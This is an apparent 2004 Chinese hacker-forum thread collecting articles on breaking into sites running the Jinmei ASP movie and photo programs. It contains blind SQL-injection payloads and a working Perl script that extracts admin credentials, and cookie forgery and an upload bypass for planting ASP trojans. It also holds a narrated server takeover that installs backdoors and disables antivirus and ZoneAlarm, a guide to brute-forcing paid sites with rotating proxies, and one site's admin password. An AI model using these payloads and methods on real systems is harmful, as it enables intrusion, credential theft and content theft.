返回列表 发帖
lamianbu 该用户已被删除
楼主 跳转到 » 倒序看帖
打印
tT
lamianbu发表于 2004-5-21 11:25 | 只看该作者

[灌水]金梅注入文章收集,还有金梅好的文章就跟!!!!!!!!1

这是一个金梅写真程序的后台管理文件,它将管理员的用户名和密码直接显示在chnage.asp页面当中了。而看change.asp源码得知,要想看到change.asp显示页面,唯一的要求是cookie的值cookies("name49s")=true。为了证实一下我的想法,我打开了本机装的金梅写真程序http://127.0.0.1:81/asp/xj/CHANGE.ASP(图1), WSockExpert.exe这个小东东来抓包,得到下列数据:(图2) GET /asp/xj/CHANGE.ASP HTTP/1.1 Accept: */* Referer: http://127.0.0.1:81/asp/xj/left.asp Accept-Language: zh-cn Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0) Host: 127.0.0.1:81 Connection: Keep-Alive Cookie: name49s=True; ASPSESSIONIDSCTARTDS=DHOLGEACJDCANHKAEMJOKFJM 哈,一切都在我们的掌握之中。我们不能只在本机折腾了,我们上网找一个金梅写真程序试试吧。很快,找到http://pic.jetdown.com这个网站。修改一下我们得到数据中的ip地址和change.asp的url,用accessdrive这个工具中的HTTP DEBUGGER来发送吧。在HTTP DEBUGGER的每个选项(httpaddress、postdate、usercookie、urlReferer)里对应修改填入我们抓的数据后,再点一下connect按扭,看看我们得到了什么?(图3) 仔细看图3,得到这样几行数据:

用 户:

于是我们知道http://pic.jetdown.com这个网站的管理用户名和密码是admin和jet&downpic,现在我们就可以登陆后台正大光明地来上传一个asp木马来扩大我们的权限了。(图4)   我通知www.jetdown.com的站长is该站有漏洞后,我又来到了金梅asp电影程序专卖店http://www.yule21.com)想看看能不能通过这个漏洞拿到金梅收费电影程序2003第三版的源码。轻车熟路得到了放在它网站上的金梅写真程序2003版演示程序的管理员的id和密码后,进入后台却发现站长却早将上传页面删掉了,是站长知道这套有漏洞,还是其它的原因删掉了该页面?这个我就不知而知了。:-) 所属分类: 脚本&编程 更新日期:2004-3-13 13:41:33 阅读次数:1019     菜鸟学习SQL注射 一般国内的小一点的新闻站点程序 都有 ""&request 这种漏洞,下面我讲解攻击方法 在地址栏: and 1=1 查看漏洞是否存在,如果存在就正常返回该页,如果没有,则显示错误,继续假设这个站的数据库存在一个admin表 在地址栏: and 0<>(select count(*) from admin) 返回页正常,假设成立了。 下面来猜猜看一下管理员表里面有几个管理员ID: and 1<(select count(*) from admin) 页面什么都没有。管理员的数量等于或者小于1个 and 1=(select count(*) from admin) 输入=1没显示错误,说明此站点只有一个管理员。 下面就是要继续猜测admin 里面关于管理员用户名和密码的字段名称。 and 1=(select count(*) from admin where len(username)>0) 猜解错误!不存在 username 这个字段。只要一直改变括号里面的username这个字段,下面给大家几个常用的 user,users,member,members,userlist,memberlist,userinfo,admin,manager,用户,yonghu 用户名称字段猜解完成之后继续猜解密码字段 and 1=(select count(*) from admin where len(password)>0) password 字段存在!因为密码字段一般都是这个拉,如果不是就试试pass如果还不是就自己想想吧 我们已经知道了管理员表里面有3个字段 id,user,password。 id 编号 user 用户名 password 密码 下面继续的就是管理员用户名和密码的猜解了。一个一个来,有点麻烦,最好找个猜解机来 先猜出长度! and 1=(select count(*) from admin where len(user)<10) user 字段长度小于10 and 1=(select count(*) from admin where len(user)<5) user 字段长度不小于5 慢慢的来,最后猜出长度等于6,请看下面,返回正常就说明猜解正确 and 1=(select count(*) from admin where len(user)=6) 下面猜密码, and 1=(select count(*) from admin where len(password)=10) 猜出来密码10位,不要奇怪,现在网管都有防备的,所以密码上20位也不太奇怪了 下面该做的就是把他们拆开来一个一个猜字母 and 1=(select count(*) from admin where left(user,1)=a) 返回正常,第一位字母等于a,千万不要把大写和小写给搞错了哦~~呵呵,如果不a就继续猜其他的字符落,反正猜到返回正常就算OK了 开始猜解帐号的第二位字符。 and 1=(select count(*) from admin where left(user,2)=ad) 就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了 工作还没有完,别忙着跑了,还有10位密码,呵呵 and 1=(select count(*) from admin where left(password,1)=a) 经过无数次错误之后...... http://xyz.hytc.edu.cn/new2/article_view.asp?id=2499 and 1=(select count(*) from admin where left(password,10)=administra) 结果密码是administra 看完文章,大家不要照着我的文章做,网络上的东西是变幻无穷的,但是我相信大家的大脑肯定比他变得快,所以希望大家看了这个文章灵活运用!那样才能达到理想的效果 所属分类: 脚本&编程 更新日期:2003-11-25 15:39:33 阅读次数:1392     金梅电影的N个SQL注入漏洞 涉及版本,金梅电影第三版 初学SQL注入,高手不要见笑,只写一此比较简单的注入。金梅电影实在是漏洞百出!先来看movie.asp 来这一段:articleid=request("id") set rs=server.createobject("adodb.recordset") sql="update learning set hits=hits+1 where articleID="&articleid rs.open sql,conn,1,3 sql="select * from learning where articleid="&articleid rs.open sql,conn,1,1articleid未经任何检查便提交了,呵呵。我们可以构造如下代码: 127.0.0.1/movie.asp?id=28%20AND%201=(select%20id%20from%20password%20where%20len(pwd)=6) 127.0.0.1/movie.asp?id=28%20AND%201=(select%20id%20from%20password%20where%20len(name)=8) 如果下常返回页面,那么可以得到后台管理员名为8位,而密码为6位。哈哈,再来: 127.0.0.1/movie.asp?id=28%20AND%201=(select%20id%20from%20password%20where%20mid(name,1,1)=w) 正常返回页面,证明后台管理员名的第一个字母为w,呵呵,接下来不用我说了吧。重复提交类似代码,就可以把管理员名和密码弄到手了。手工输入就太麻烦了,下面这段脚本用来测试这一漏洞: #!/usr/bin/perl #The s cript Crack admin for 金梅电影程序 #Code by 520world use IO::Socket;system(cls); $ARGC = @ARGV; if ($ARGC < 3) { print "\n\n"; print "\t* The s cript Crack admin for 金梅电影程序 *\n"; print "\n\tExample: jmsql.pl 127.0.0.1 /movie.asp 53 \"\n"; print "\t jmsql.pl \n\n\n"; exit; } $host = @ARGV[0]; $way = @ARGV[1]; $txtid = @ARGV[2]; $errinfo =@ARGV[3]||800a0bcd; $port = 80; print "\n\t* Code by 520world QQ:20000445 *\n"; print "\n\n开始在 $host 上进行测试,请等待......\n"; for ($passlen=1;$passlen<=20;$passlen++) { $way1 = "?id=$txtid%20AND%201=(select%20id%20from%20password%20where%20len(pwd)=$passlen)";&url;@res = &connect;if ("@res" !~ /$errinfo/) { print "\n\t* 发现ID=1的管理员的密码长度为: $passlen 位\n"; last; } }for ($userlen=1;$userlen<=20;$userlen++) { $way1 = "?id=$txtid%20AND%201=(select%20id%20from%20password%20where%20len(name)=$userlen)";&url;@res = &connect;if ("@res" !~ /$errinfo/) { print "\n\t* 发现ID=1的管理员的用户名长度为: $userlen 位\n"; last; } }@dig=(0..9); @char=(a..z); @tchar=qw(` ~ ! + @ # $ ^ * \( \) _ = - { } [ ] : " ; < > ? | , . / \\); @dic=(@dig,@char,@tchar); @dic1=(@char,@dig,@tchar);print "\n开始尝试获取ID=1的管理员的用户名,请等待......\n";for ($userlocat=1;$userlocat<=$userlen;$userlocat++) { foreach $usertemp(@dic1) { $user=$userdic.$usertemp;$way1 = "?id=$txtid%20and%201=(select%20id%20from%20password%20where%20mid(name,1,$userlocat)=$user)";&url;@res = &connect;if ("@res" !~ /$errinfo/) { if ($userlocat==$userlen){print "\n\n\t* 获取成功!!! ID=1的管理员名字是: $user\n";last;} print "\n\t* ID=1的管理员名字的前 $userlocat 位为 $user"; $userdic=$userdic.$usertemp; last; } } } print "\n\n\n\t* 测试完毕. 获取到一个用户名为$user! *\n"; print "\n\n\n"; #system(pause); sub url { $req = "GET $way$way1 HTTP/1.0\n". "Host: $host\n". "Referer: $host\n". "Cookie: \n\n"; } sub connect { my $connection = IO::Socket::INET->new(Proto =>"tcp", PeerAddr =>$host, PeerPort =>$port) || die "Sorry! Could not connect to $host \n";print $connection $req; my @res = <$connection>; close $connection; return @res; }其实我是个菜鸟,这段脚本是根据wawa的动网文章改来的,还请高手不要见笑,多多指教啊。 因为是用来测试的程序,所以没有提供猜测密码的代码,还请大家不要做坏事哦! 用法:jmsql.pl <网站域名> <页面路径movie.asp> <能正常返回页面的id>再来看class.asp, <% MaxPerPage=5 dim totalPut dim CurrentPage dim TotalPages dim i dim ty typeid=request("typeid") if not isempty(request("page")) then currentPage=cint(request("page")) else currentPage=1 end if dim rstype dim typesql dim types if not isEmpty(request("typeid")) then typeid=request("typeid") else typeid="全部" end if %> ............略 if typeid="全部" then sql="select articleid,title,hits from learning order by hits desc" else sql="select articleid,title,hits from learning where typeid="&typeid&"order by hits desc" end if Set rst= Server.CreateObject("ADODB.Recordset") rst.open sql,conn,1,1 if rst.eof and rst.bof then response.write "

该栏目没有任何电影

"呵呵,又来了,typeid未经任何检测。看下面的代码: http://127.0.0.1/class.asp?typeid=动作片%20and%201=(select%20id%20from%20password%20where%20len(name)>6)%20and%201 正常返回页面,那么管理员的密码长度大于六了。哈哈。 不用再说了。重复类似代码,管理员名和密码又能到手了。。。。。还有/user/searchname.asp, 看代码: <% if request("searchuser")<>"" then set rs=server.createobject("adodb.recordset") sql="select userid from users where userid="&request("userid")&"" rs.open sql,conn,1,2 if rs.eof then response.write "alert(这一“用户名称”还未被注册你可以使用!);window.close();" response.end else response.write "alert(这一“用户名称”已被占用,请得新输入!);history.back();" response.end end if rs.close 又是未经任何检查。 我们先注册一个用户,比如jjhhh. 下面打开searchname.asp,在检查用户名的输入框中输入如下代码: jjhhh and 1=(select id from password where len(name)=6) and 1 提交查询,返回“用户名已被注册,请得新查询”(晕,金梅字都打错了!!!!) OK,得到管理员的用户名为六位,,呵呵。 再来, jjhhh and 1=(select id from password where mid(name,1,1)=w) and 1 返回用户名已被注册,哈哈,管理员ID第一个字母是w! .......................... 关于这个页面的注入我也写了个脚本,且已编译成exe,有兴趣的朋友可以和我要。 金梅电影中,诸如此类的漏洞好象还有不少,我这个菜鸟就不再献丑了。希望这篇文章能够抛砖引玉。 也希望金梅能尽快完善程序,金梅用的人很多,商业站也有不少,不要再有洞了。 那个movie.asp中的洞,我看一个星期前已经有人发布了,但是我昨天扫金梅官网,发现他还没有堵这个注入。而仅仅把自己password表名修改了事。其实要堵这些洞,个人觉得并不是太难,只要写的时候多注意提交的检查。比如过滤掉提交中的空格和‘还有=以及()。 再不然就是限制提交的字符数。终极做法可以用md5加密后台密码,别人拿到密码也是白费。 所属分类: 脚本&编程 更新日期:2003-11-25 15:34:50 阅读次数:2185     SQL注入网站入侵实例 这几天闲得无聊,想上网Down几部电影来看,找了找都是要Money的,不爽,花时间跑去汇钱还不如找个有漏洞的黑一黑。于是,计划开始: (为避免不必要的误会,网址、用户名、密码做了一些修改,不过方法是100%原汁原味)1.寻找入口 准备:如果你以前没尝试过SQL注入攻击,那应该把HTTP友好提示关闭,这样才能让你清楚看到服务器端返回的提示信息。 尝试几个有传入参数的页面,逐个测试是否有SQL注入漏洞,识别方法为:把网址栏的ID=***x加个号,或在表单输入号,如果提示表达式错误,表示有漏洞可注入,另外,通过这个方式可以得到程序所用的数据库类型。 经测试,发现有几个页面有注入漏洞,决定从http://www.movie.com/movie.asp?ID=1000入手,输入http://www.movie.com/movie.asp?ID=1000,得到信息:数据库用是的ACCESS,提示ArticleID=1000附近有表达式错误,嘿,原来是个用文章系统改出来的电影站。2.观察网站环境 网站提供的功能有:影片分类、影片介绍、影片搜索,影片的ID大概从1000-1500之间。3.猜表名 查清楚敌人情况之后,开始行动,行动的第一步都是从猜表名开始,http://www.movie.com/movie.asp?ID=1000,把1000改成(select count(1) from user),那么,他原来的SQL语句将会变成: Select [字段列表] from [影片表] where 影片ID=(select count(1) from user) 如果猜对表名,将有可能出现下面三种情况: A.显示某部影片的信息(巧合的情况) B.显示影片找不到(如果有判断是否为EOF) C.提示错误信息(EOF OR BOF) 如果猜错,将会直接提示找不到表名。 把user,users,member,members,userlist,memberlist,userinfo,admin,manager,用户,yonghu这些常用表名一个个放进去试,一般成功率都不低于80% 结果,成功猜中该网站的用户名表名为users4.猜列名 至于猜列名,不用我介绍大家都应该清楚怎么做了,把(select count(1) from users)改成(select count(id) from users),如没提示"找不到字段"就表示字段名是正确的,字段一般不用太费力,在Login的时候看看表单的名称就大概可以猜到一些了。 果然,这个网站也不例外,用户表中字段为ID(数字),UserID(文本),Password(文本),积分字段猜得比较费劲,为money5.锁定目标 让users表只返回money最多的一个记录,以便进行猜解、并避免猜中一些没money的用户名: http://www.movie.com/movie.asp?ID=(select 1000 from user where money>1000) 结果:提示子查询不能返回两条以上记录 锁定>10000,提示不变; 锁定>100000,提示找不到记录,说明没有积分大于10万的用户; 从1万到10万逐步缩小范围,得知积分大于25500只有一条记录。6.计算用户名及密码长度 因为影片的ID大概从1000-1500之间,可以用UserID的长度+1000得出的数(即影片ID)计算用户名长度,键入: http://www.movie.com/movie.asp?ID=(select len(UserID) %2B 1000 from user where money>25500)%2B是什么?因为地址栏的+号request出来会变成空格,所以+号要用UrlEncode过的%2B表示。结果返回片名为《双雄》的影片,呵呵,怎么办?不是有搜索功能吗?拿去搜一下,看看影片ID是多少吧。 搜索,得出影片ID是1006,显然,用户名长度为1006-1000=6;同样方法,得出密码的长度为87.分步破解用户名 有点SQL应用经验的人应该都想到方法了,来,敲入: http://www.movie.com/movie.asp?ID=(select asc(mid(UserID,1,1)) %2B 1000 from user where money>25500) 呵呵,又返回一部影片,搜索一下,影片ID为1104,即asc(mid(UserID,1,1))=104 同样方法,得出: asc(mid(UserID,2,1))=117 asc(mid(UserID,3,1))=97 asc(mid(UserID,4,1))=106 asc(mid(UserID,5,1))=105 asc(mid(UserID,6,1))=101 因为len(UserID)=6,所以算到第6位就行了,查asc对应表(会编程的可以写几句话算出来),chr(104)=h,chr(117)=u,chr(97)=a,chr(106)=j,chr(105)=i,chr(101)=e 连起来,用户名就是huajie8.同样的方法破解密码 asc(mid(Password,1,1))=49 => chr(49)=1 asc(mid(Password,2,1))=57 => chr(49)=9 asc(mid(Password,3,1))=55 => chr(49)=7 asc(mid(Password,4,1))=56 => chr(49)=8 asc(mid(Password,5,1))=48 => chr(49)=0 asc(mid(Password,6,1))=55 => chr(49)=7 asc(mid(Password,7,1))=55 => chr(49)=1 asc(mid(Password,8,1))=55 => chr(49)=2 拼起来:19780712,哈哈,又是用生日做密码的! 接下来,输入用户名和密码,登录系统,成功!猜表名列表之前用了30分钟,破解用了15分钟,45分钟搞掂了一个站。接下来做什么?当然是先Down几G的电影下来再说了。◇ 广告时间: 本文为NB联盟-小竹原创文章,另外,使用NB联盟开发的SIS3(SQL注入猜解机)能加快破解速度,使用方法将由NB联盟-jadesun编写。 NB联盟提供专业级的网站程序开发、数据库开发、收费技术支持、安全顾问服务 一次比较困难的WIN2000渗透 日期:2004年3月24日 作者:阿新 人气:1140 查看:[大字体 中字体 小字体] 这次渗透用到东西比较全面,写出来给大家参考,当中我走了不少弯路,粗心也有 漏洞:web程序漏洞。目标:获取管理员密码,并进入远程桌面 这里就不详细说这个web程序漏洞了,大家都知道的金梅电影程序uploadfilm.asp没过滤文件上传类型,并且不需要管理员认证!大家可以找找用金梅电影程序网站,试试这个漏洞,金梅4已经没有了。好了下面详细说说渗透过程 上传的asp木马是lcx的木马,红粉佳人(晕),木马的asp代码是加密的,这样可以躲过杀毒软件,嘿嘿 1,利用Serv-U 输入密码,看到了网站的全部文件,现在我得到了webshell第一件是就是看看他装的是什么ftpserver,在浏览器输入 ftp://www.domain.com 回显 serv-u 4.1 ready...什么的,嘿嘿,可能话可以用端口映射的方法获取admin,接着在asp木马输入net user,这里主要看看这个webshell有没有执行权限,很遗憾没有,端口映射得方法不能用!当然不会就这么放弃的 切换盘符: C盘 ,NTFS 做了权限不能浏览 浏览目录: c:\progra~1 回车,浏览c:\Program Files ,看到了可爱的Serv-U,虽然我知道99.9%ServUDaemon.ini里面的密码是加密的,但还要看看,汗````加密的,再看看能不能写,无权限,死心了!!!! 2,利用pcanywhere 返回免FSO页 浏览目录 C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere 发送命令 看到了一个账号PCA.sx365.CIF C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywherePCA.sx365.CIF copy D:\wwwroot\wwwdomiancom\wwwroot\ 发送命令 显示命令成功 浏览器输入 htpp://www.domain.com/PCA.sx365.CIF down下来了,用流光看到了密码 嘿嘿 赶快打开pcanywhere连接肉鸡,奇怪是密码尽然错误的,事后我才知道他的pcanywhere密码不是放在C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere 里的!晕到 3,绝对意外的发现 到此可以放弃了,想不到什么办法了,于是我就准备下载他的电影数据库,看看管理员账号,弄个账号看看电影,打开articleconn.asp 一看,乐死我了,他用的是sql版本的金梅,哈哈哈,居然用的sa账号,马上打开mssql连接器连接,晕倒,连不上端口过滤掉了,还好最新版的红粉佳人带了sql连接,只能再次返回免FSO页,输入sa 和密码,执行cmd命令 net user \\ 的用户帐户 ------------------------------------------------------------------------------- ................... 嘿嘿可以执行 上传后门把 传至服务器已有目录: D:\wwwroot\wwwdomiancom\wwwroot\ Inject.exe 上传成功 传至服务器已有目录: D:\wwwroot\wwwdomiancom\wwwroot\ TBack.DLL 上传成功 这个是hotmail老师的wineggdropshell,我用的是个人版的,发行版的可能会被杀 下面执行sql_cmd copy D:\wwwroot\wwwdomiancom\wwwroot\Inject.exe c:\winnt\system32 已复制 copy D:\wwwroot\wwwdomiancom\wwwroot\TBack.DLL c:\winnt\system32 已复制 Inject.exe -run Remote DLL Injector V1.9 Private Version By WinEggDrop ....... 安装成功 打开cmd telnet www.domain..com 21221 晕倒连不上....... 4,突破防火墙 后门连不上,第一感觉对方用了IP 安全机制(其实不是用的IP 安全机制),来试试反向连接的后门吧,安装hotmail老师的portless ,安装没问题,但反向连接也没用,这时我临机一动 sql_cmd net stop serv-u 重新配置后门端口为21,安装完成后 telnet www.domain..com 21 连不上,到此我知道肉鸡用了防火墙,55555 net start 一大堆服务 看得头大 还是看进程吧 上传了Process.exe(查进程和杀进程的小程序) Process.exe 看到了norton 和瑞星 ,这个简单用Process.exe kill掉,然而瑞星的一个rtscan.exe 死活杀不掉 帮你改名 ren 路径\rtscan.exe rtscan.exe.bak 上传reboot.exe reboot.exe /r 服务器重起了 这下你死定了,telnet www.domain..com 21221 连不上,汗,防火墙+IP 安全机制 telnet www.domain..com 21 竟然还是连接不上 哦!norton的又启动了 kill 掉norton的进程 telnet www.domain..com 21 晕倒连接不上 Process.exe 已经没有任何防火墙的程序了,连病毒防火墙都没有````` 见鬼了````难倒遇到了硬件防火墙!!!!!!!pcanywhere的密码又不对,晕阿 5,zonealarm zonealarm一个超牛x的防火墙,再次Process.exe 我看到了 装在了 c:\winnt\system32\zonealarm 这个防火墙我不熟悉,问了一下hotmail老师得知安装成两个服务,一下是我和hotmail老师的对话 2004-02-20 04:18:25 阿新(Root) 我在农肉鸡 2004-02-20 04:36:20 WinEggDrop 又搞什么肉机了 2004-02-20 04:36:38 WinEggDrop 你看上眼的应该是"非一般"的肉机吧 2004-02-20 04:19:24 阿新(Root) 电影的 2004-02-20 04:25:03 阿新(Root) 我搞不定了 2004-02-20 04:25:36 阿新(Root) 我删掉它的serv-u wineggdropshell 改成21端口 还是不行 2004-02-20 04:43:11 WinEggDrop 有防火墙 2004-02-20 04:53:42 WinEggDrop 应该是有norton防火墙 2004-02-20 04:54:12 WinEggDrop 得停了那东西 2004-02-20 04:37:33 阿新(Root) 55555 2004-02-20 04:55:13 WinEggDrop 上传个sc.exe 2004-02-20 04:55:16 WinEggDrop 看看有什么服务 2004-02-20 04:55:24 WinEggDrop norton防火墙能停的 2004-02-20 04:55:36 WinEggDrop 我记得是两个服务的 2004-02-20 04:55:42 WinEggDrop 一个是exe的服务,一个是驱动 2004-02-20 04:40:33 阿新(Root) 你到我的服务器上来 2004-02-20 04:40:58 阿新(Root) 终端的 2004-02-20 04:41:33 阿新(Root) 等你呢 2004-02-20 04:59:31 WinEggDrop 进去了 2004-02-20 04:59:39 WinEggDrop 你控制我,还是我控制你 2004-02-20 04:42:24 阿新(Root) 你连接我 2004-02-20 05:01:26 WinEggDrop 不是norton防火墙 2004-02-20 04:44:10 阿新(Root) 是什么 2004-02-20 05:01:33 WinEggDrop 是zonealarm 2004-02-20 05:01:40 WinEggDrop 更强的防火墙,等一下 2004-02-20 04:44:29 阿新(Root) [;P] 找到就好 哈哈哈 2004-02-20 05:01:54 WinEggDrop net stop vsmon 2004-02-20 05:02:05 WinEggDrop net stop vsdatant 2004-02-20 05:03:13 WinEggDrop net stop vsdatant /y 2004-02-20 05:03:43 WinEggDrop 上传sc 2004-02-20 04:46:29 阿新(Root) 有了 2004-02-20 05:04:03 WinEggDrop 呵呵,想到什么法子 2004-02-20 04:47:01 阿新(Root) 没有啊 我说SC有了 2004-02-20 05:04:33 WinEggDrop sc config vsmon disabled 2004-02-20 05:04:40 WinEggDrop sc config vsdatant disabled 2004-02-20 05:05:14 WinEggDrop sc config vsdatant start= disabled 2004-02-20 05:05:25 WinEggDrop sc config vsmon start = disabled 2004-02-20 05:05:31 WinEggDrop 太旧没用sc了 2004-02-20 04:48:42 阿新(Root) 把他的程序名改掉 2004-02-20 05:06:49 WinEggDrop 命令多了个空格呀 2004-02-20 05:07:01 WinEggDrop sc config vsmon start= disabled 2004-02-20 05:07:07 WinEggDrop start后面没空格的 2004-02-20 04:49:57 阿新(Root) 好了 哈哈哈 2004-02-20 05:07:20 WinEggDrop 两个服务都搞了吗? 2004-02-20 04:50:03 阿新(Root) 是啊 2004-02-20 05:07:25 WinEggDrop 重启应该就可以了 2004-02-20 05:08:04 WinEggDrop 不用改名也行的了,服务都被禁止了,呵呵 2004-02-20 04:51:14 阿新(Root) 重启了 哈哈哈 这下好了 有剪接,到此服务器完全搞定,最后告诉大家他的pcanywhere密码文件是放在 c:\progra~\sys什么的目录里的就是pcanywhere的安装目录! 当中有遗漏,因为我不可能一边渗透一边记录,that's all 收费网站破解攻略 日期:2004年3月24日 作者: 人气:3087 查看:[大字体 中字体 小字体] 1、谈到破解,当然需要一个工具,在这方面我们不得不承认国外的破解工具胜过国货 我以前用过流光等一些黑客工具。在破解网站的能力上十分有限。所以我在这里向 大家推荐一个破解工具 AccessDiver v4.92 汉化版 (下载http://www.onlinedown.net/accessdiver.htm) 下载安装后。当然现在需要的是我们破解的对象,也就是想要破解的网站了。首先大家需要找到网站members的入口地址,举个例子我们在下面这个网页中看到了members only的标志 http://***********/cgi-bin/**********.cgi/raw_3710/Z 那么我们就可以把鼠标放到members only上面然后点右键,点复制快捷方式,这样我们就 得到了我们要破解的网址了。我们把这个网址http://*******/me****/index.html 复制到破解工具AccessDiver最顶端SERVER后面的的那个长方框里面。ok!!第一步就完成了 。 呵呵!!很多朋友听到这里可能觉得,这么简单啊!!你还用那么长时间才学会,真是笨 其实这只是刚刚开始,接下来跟着我一起继续破吧! 我们破解确实很爽。别人开网站的就到了霉,如果那一天发现我们的ip破他的网站 他肯定会拚了老命也要把我们逮出来。所以这里就要说到破解的安全性了。也就是proxy 的使用,请大家在AccessDiver的界面点proxy然后在 USE WEb proxies前面的方格里打勾 看到Rotate proxies了吧?继续在它前面的方格你打勾,然后你会看到在Rotate proxies 与logins to try before swapping 之间又出现一个方格,然后在里面填上 1 。这个选项 是说我们每用完一个proxies后然自动换另一个,这是保证破解质量的一个重要因素。因为 网站在安全系统方面已经改进了很多,如果你用一个ip(代理)破解它的网站,不到1 分钟。便死悄悄了。。。。所以下面我们就需要一个所谓的proxylist.我在这里可以向大家 提供一个list,大家把它保存在自己的硬盘后,然后用proxyhunter把它们检验一遍。把好的 代理(proxies)保留在一个文档,然后在界面proxy--my list的最右边点击那个黄色文件夹 的标志,我们就可以把刚才存档的proxy文档输进去了。然后对着最上面“黑色的勾“点右键就把所有的proxy选择了,最后在任意一个proxy上点一下,也就算把proxy的准备工作结束了。最关键的时刻来到了,做完最后一部我们就可以开始破他了!也就是我们常说到的 字典了,字典对于破解网站有着不言而喻的关键作用,字典如果选得不好,你就算从 你的虫虫没长好开始破一直破到你老眼昏花都是无济于事的。那么今天我在这里会向大家 贡献一个wordlist(字典),以后大家就要自己来leech wordlist.这里我不作详细介绍 ,具体的方法我会在大家对这个破解工具比较熟悉的情况下继续介绍。好的。点Dictionary 在点 Curently used,然后点load a comb file把我给你的wordlist输进去吧!! 哈哈!!终于快写完了,大家也快见到曙光了。我们现在就可以开始了。记住上面的每 一步你都要照做,否则开始不了不要找我!!如果你之前得每一部都搞定,那么我们就点 AccessDiver界面左上方黄色的Standard键,嘿嘿!!应该开始了吧!如果没有,就是你的 proxy的问题。那么到proxy--my list 选项里选择一个其他的proxy在开始 基本上最基本的方法我写完了,第一次肯定不会顺利。要知道我第一次破出密码是 看了文章后的一个星期左右啊!你们比我幸运,至少看得是中文呀!时间肯定比我少,但是 破不出来也不要伤心,自己慢慢的研究。 关于对proxy设置的重要补充: 就是首先大家要把my skill选成expert. 然后然后在 USE WEb proxies前面的方格里打勾 看到Rotate proxies了吧?继续在它前面的方格你打勾,然后你会看到在Rotate proxies 与logins to try before swapping 之间又出现一个方格,然后在里面填上 1 在proxy skipping 下面有四个框,在前3个框上打勾。 在proxy handing下第一个框前打勾 在试试吧! 2、介绍一些cracker常用的小软件,帮助你们加快速度。 一,SiteCheck 这个软件用来检测你手中已有的password是否可用。首先将你看来的或者自己破解的password统统copy & paste进一个文本文件,每行的格式如下: http://username:******@*******/members/ 然后打开sitecheck,选中这个文本文件,填上一个proxy,选择test hacked sites,它给开始检测,如果password失效,就清除掉,留下仍然可用的password,检测完可以保存。 注意,如果你有同一个站点的多个password,最好不要用这个软件检测,因为它不能自动更换代理,所以可能被站点block掉你的ip,这样所有的密码都会被认为失效。 二,Raptor wordlist是cracker最宝贵的东西,如同少女的第一次。随着对crack的不断深入,就会发现实际上很多时间都是用来寻找,处理,完*自己的wordlist。如果你希望从网上众多的破解网站leech password,或者将自己wordlist里重复的login去除掉,或者做出一份指定格式的wordlist,我想你需要一个好的password软件,这就是raptor。 raptor的功能很多,界面也非常友好(我很少见到界面如此友好的黑客软件),所以我不打算一一介绍如何使用,只介绍最常用的几个功能: 1,打开一个wordlist,选"remove duplicates",去除掉所有重复的login。 2,"pass leech"里填加一个破解网站的地址,或者倒入一个list,大家可以把scheisse给出的破解网站地址保存为一个txt,然后在raptor里导入,然后选择start,开始leech password,对新手来说,这是得到wordlist最简单的办法。 3,在filter里,可以指点用户名和密码的长度,大小写等格式,从而得到一份你想要的wordlist。 其他还有合并wordlist文件,生成adultcheck,agecheck密码文件等强大功能,建议新手好好熟悉这个软件,只要你有兴趣crack,就离不开这个软件 得到wordlist(字典)的办法: 把下面的地址保存为文档,打开AccessDiver,点Dictionay,点Web Word Leecher 把保存好的文档输入里面。点start leehing.把的到的wordlist保存起来 这个过程可以10-15天进行一次,因为这些网站试在不断的更新的。 你就可以不断的得到新的wordlist.
[这个贴子最后由lamianbu在 2004/05/21 11:56am 第 4 次编辑] 希望大家 共同收集金梅资料 共同研究 所属分类: 脚本&编程 更新日期:2004-1-6 16:40:23 阅读次数:1258     轻取金梅写真程序2003版 金梅写真程序2003版是金梅asp程序专卖店http://www.yule21.com)出品的一款收费的ASP+ACCESS程序,在其网站上明码标价250元出售。这套程序可能知道的人并不是很多,但目前金梅专卖店的另一款金梅收费电影程序2003第三版在网络上风头正劲,被许多电影网站所采用。一开始我是想在网上下载金梅专卖店的电影程序来看看有什么漏洞可以利用,如果被我看出来的话,我可就有免费电影看了,但我在网上一直没有搜到这套源码,倒是找到了金梅写真程序2003版的源码下载。于是漏洞分析开始了......   很快,我在本机安装完这套程序后几乎不到1分钟,我就发现了第1个漏洞。popnew.asp文件没有对id参数做任何过滤,在popnew.asp源码里涉及到id这个参数时只是简单写到:sql="select * from news where articleid="&request("id")。对于这种sql注射的攻击方法,我想大家也都耳熟能详了,那就是利用跨表子查循来破解管理员的用户名和密码。我们可以http://www.target.com/pomnew.asp?id=num这个语句后边用sql语法勾造and 1=1和and 1=2条件为真或假的等式,根据页面反馈回来的不同信息来破解出管理员的id和密码。 但这种方法是要猜很多次才能猜出一个正确的结果,而且如果目标网站的管理员用了中文的id和密码的话,恐怕我就又要费一番周折了。先将这个漏洞放一边吧,我再来看看有没有别的漏洞。   没过多久,我又发现了这套程序的第2个漏洞,整套程序的逻辑验证不严导致了像我这样的恶意用户可以利用upfile.asp上传任意文件。我们来看一下这套金梅写真程序的工作流程;登陆后台的关口程序是login.asp->输对用户名和密码后就可以登陆了->正确登陆后产生cookie值:cookies("name49s")=true->如果cookie值name49s为true就可以调用upload.asp向upfile.asp提供数据生成上传文件,如果cookie值name49s为false就返回login.asp重新登陆。好像这一切都很完美,作者以为无懈可击,但他恰恰忽略了向upfile.asp提供数据的不一定就是upload.asp,我们可以用一个本地的表单直接向upfile.asp提供数据。我们在本机装好一个金梅写真系统,输入管理员用户名和密码后,来到上传页面,像在我本机装的urlhttp://127.0.0.1/asp/xj/UPLOAD/upload.asp。我们将它保存成html网页到本地,并修改本地这个html页的action="upfile.asp"改为actiob="http://目标网站的写真程序的web目录/UPLOAD/upfile.asp"。然后再打开这个本地这个html页直接向http://目标网站的写真程序的web目录/UPLOAD/upfile.asp提交一个海阳顶端网asp木马,就可以成功上传了。于是你说,就这样简单吗?错!源码作者还是做了一定的防范的。asp木马上传是上传了,文件上传到了http://目标网站的写真程序的web目录/UPLOAD/imgwsf/这个目录,但是我们却无法得知上传的文件名,因为upload.asp将我们上传的文件改名了!看看upfile.asp源码吧,它是如何改名的: <% function makefilename(fname) fname = now() fname = replace(fname,"-","") fname = replace(fname," ","") fname = replace(fname,":","") makefilename=fname end function ....略去一些和改名无关代码 iCount=0 ......略去一些和改名无关代码 fname = makefilename(now()) & iCount & "." & GetExtendName(file.FileName) ......略去一些和改名无关代码 function GetExtendName(FileName) dim 